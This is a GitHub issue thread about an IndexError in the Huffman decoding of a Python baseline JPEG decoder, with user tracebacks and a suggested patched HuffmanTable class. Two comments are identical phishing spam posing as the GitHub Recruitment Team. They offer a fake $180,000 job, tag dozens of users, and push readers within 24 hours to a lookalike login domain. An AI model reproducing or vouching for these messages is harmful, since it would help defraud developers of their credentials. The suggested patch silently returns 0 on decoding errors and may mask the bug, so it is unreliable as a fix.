### ISSUE TITLE
IndexError: list index out of range

### ISSUE THREAD

**Issue by dylan-sam** [yasoob/Baseline-JPEG-Decoder#1]
Hello,

I've tried using your code with your original picture and it worked, but with other picture such as the one below, I get the following error : 

Traceback (most recent call last):
  File "...", line 363, in <module>
    img.decode()
  File "...", line 350, in decode
    len_chunk = self.StartOfScan(data, len_chunk)
  File "...", line 290, in StartOfScan
    st, 0, self.quant[self.quantMapping[0]], oldlumdccoeff
  File "...", line 253, in BuildMatrix
    code = self.huffman_tables[0 + idx].GetCode(st)
  File "...", line 201, in GetCode
    res = self.Find(st)
  File "...", line 196, in Find
    r = r[st.GetBit()]
IndexError: list index out of range

I've looked into it and it seems that when the error occurs, r is a list of size 1, st.GetBit() is 0, but the code still fails. So I've tried to force Find to return r[0] when r is of size 1, but then another error occurs

Traceback (most recent call last):
  File "...", line 363, in <module>
    img.decode()
  File "...", line 350, in decode
    len_chunk = self.StartOfScan(data, len_chunk)
  File "...", line 290, in StartOfScan
    st, 0, self.quant[self.quantMapping[0]], oldlumdccoeff
  File "...", line 260, in BuildMatrix
    code = self.huffman_tables[16 + idx].GetCode(st)
  File "...", line 201, in GetCode
    res = self.Find(st)
  File "...", line 196, in Find
    r = r[st.GetBit()]
  File "...", line 218, in GetBit
    b = self.data[self.pos >> 3]
IndexError: list index out of range

Any idea why this occurs ? Thanks in advance !

![cat](https://user-images.githubusercontent.com/5106319/98979124-406a8700-251b-11eb-8761-2539487542d8.jpg)

**Comment by Chrisa142857** [comment]
Hi, 😀

I have got the same situation. I've tried three other pictures, and all of them shown the **wrong result** before hitting the error.

For example, I added a pause into decoding after each `DrawMatrix`
![image](https://user-images.githubusercontent.com/32612977/125743915-4cab90c7-f5b4-4c40-a273-df7e9ac4f484.png)
and then it is suspended with the same error
```
Traceback (most recent call last):
  File "JPEG.py", line 371, in <module>
    img.decode()
  File "JPEG.py", line 353, in decode
    len_chunk = self.StartOfScan(data, len_chunk)
  File "JPEG.py", line 284, in StartOfScan
    st, 0, self.quant[self.quantMapping[0]], oldlumdccoeff
  File "JPEG.py", line 247, in BuildMatrix
    code = self.huffman_tables[0 + idx].GetCode(st)
  File "JPEG.py", line 192, in GetCode
    res = self.Find(st)
  File "JPEG.py", line 187, in Find
    r = r[st.GetBit()]
IndexError: list index out of range
```
while the input is
![mountains](https://user-images.githubusercontent.com/32612977/125744173-222c0737-26da-43f3-bc1b-c20de2e3c0fe.jpg)

**Comment by xiaonengmiao** [comment]
Same issue! Did u guys solve this at the end?

**Comment by liuzhebaba** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Kinice, @wuchangming, @nucreativa, @flrnull, @oneLZH, @williamrijksen, @elend80, @uffxoje, @Porchourng, @clydeqin7, @adyanf, @PixiBixi, @yanniznik, @FourLeafTec, @manishbhatias, @joeycih, @masskoder, @mjsrs, @doritochips, @hylong

**Comment by liMike1998** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
xrzhao, @pylebecq, @zalalov, @Fooooooooooox, @Snowpine, @DieHard073055, @coolcode, @mattia-crypto, @dohaki, @oudommeas, @zxstim, @fly51fly, @youngqqcn, @mozila80, @Veblin, @BlockBeliever, @kallydev, @jpcenteno, @NicholasJupiter, @kbakdev

**Comment by DRCRecoveryData** [comment]
> Hello,
> 
> 
> 
> I've tried using your code with your original picture and it worked, but with other picture such as the one below, I get the following error : 
> 
> 
> 
> Traceback (most recent call last):
> 
>   File "...", line 363, in <module>
> 
>     img.decode()
> 
>   File "...", line 350, in decode
> 
>     len_chunk = self.StartOfScan(data, len_chunk)
> 
>   File "...", line 290, in StartOfScan
> 
>     st, 0, self.quant[self.quantMapping[0]], oldlumdccoeff
> 
>   File "...", line 253, in BuildMatrix
> 
>     code = self.huffman_tables[0 + idx].GetCode(st)
> 
>   File "...", line 201, in GetCode
> 
>     res = self.Find(st)
> 
>   File "...", line 196, in Find
> 
>     r = r[st.GetBit()]
> 
> IndexError: list index out of range
> 
> 
> 
> I've looked into it and it seems that when the error occurs, r is a list of size 1, st.GetBit() is 0, but the code still fails. So I've tried to force Find to return r[0] when r is of size 1, but then another error occurs
> 
> 
> 
> Traceback (most recent call last):
> 
>   File "...", line 363, in <module>
> 
>     img.decode()
> 
>   File "...", line 350, in decode
> 
>     len_chunk = self.StartOfScan(data, len_chunk)
> 
>   File "...", line 290, in StartOfScan
> 
>     st, 0, self.quant[self.quantMapping[0]], oldlumdccoeff
> 
>   File "...", line 260, in BuildMatrix
> 
>     code = self.huffman_tables[16 + idx].GetCode(st)
> 
>   File "...", line 201, in GetCode
> 
>     res = self.Find(st)
> 
>   File "...", line 196, in Find
> 
>     r = r[st.GetBit()]
> 
>   File "...", line 218, in GetBit
> 
>     b = self.data[self.pos >> 3]
> 
> IndexError: list index out of range
> 
> 
> 
> Any idea why this occurs ? Thanks in advance !
> 
> 
> 
> ![cat](https://user-images.githubusercontent.com/5106319/98979124-406a8700-251b-11eb-8761-2539487542d8.jpg)
> 
> 

try this:
```
class HuffmanTable:
    """
    A Huffman Table class
    """

    def __init__(self):
        self.root = []
        self.elements = []

    def BitsFromLengths(self, root, element, pos):
        if isinstance(root, list):
            if pos == 0:
                if len(root) < 2:
                    root.append(element)
                    return True
                return False
            for i in [0, 1]:
                if len(root) == i:
                    root.append([])
                if self.BitsFromLengths(root[i], element, pos - 1) == True:
                    return True
        return False

    def GetHuffmanBits(self, lengths, elements):
        self.elements = elements
        ii = 0
        for i in range(len(lengths)):
            for j in range(lengths[i]):
                self.BitsFromLengths(self.root, elements[ii], i)
                ii += 1

    def Find(self, st):
        r = self.root
        while isinstance(r, list):
            bit = st.GetBit()
            if bit is None:
                return None  # Handle the case when st.GetBit() returns None
            if bit >= len(r):
                return None  # Handle the case when the index is out of range
            r = r[bit]
        return r

    def GetCode(self, st):
        while True:
            res = self.Find(st)
            if res is None:
                return 0
            elif res != -1:
                return res
```
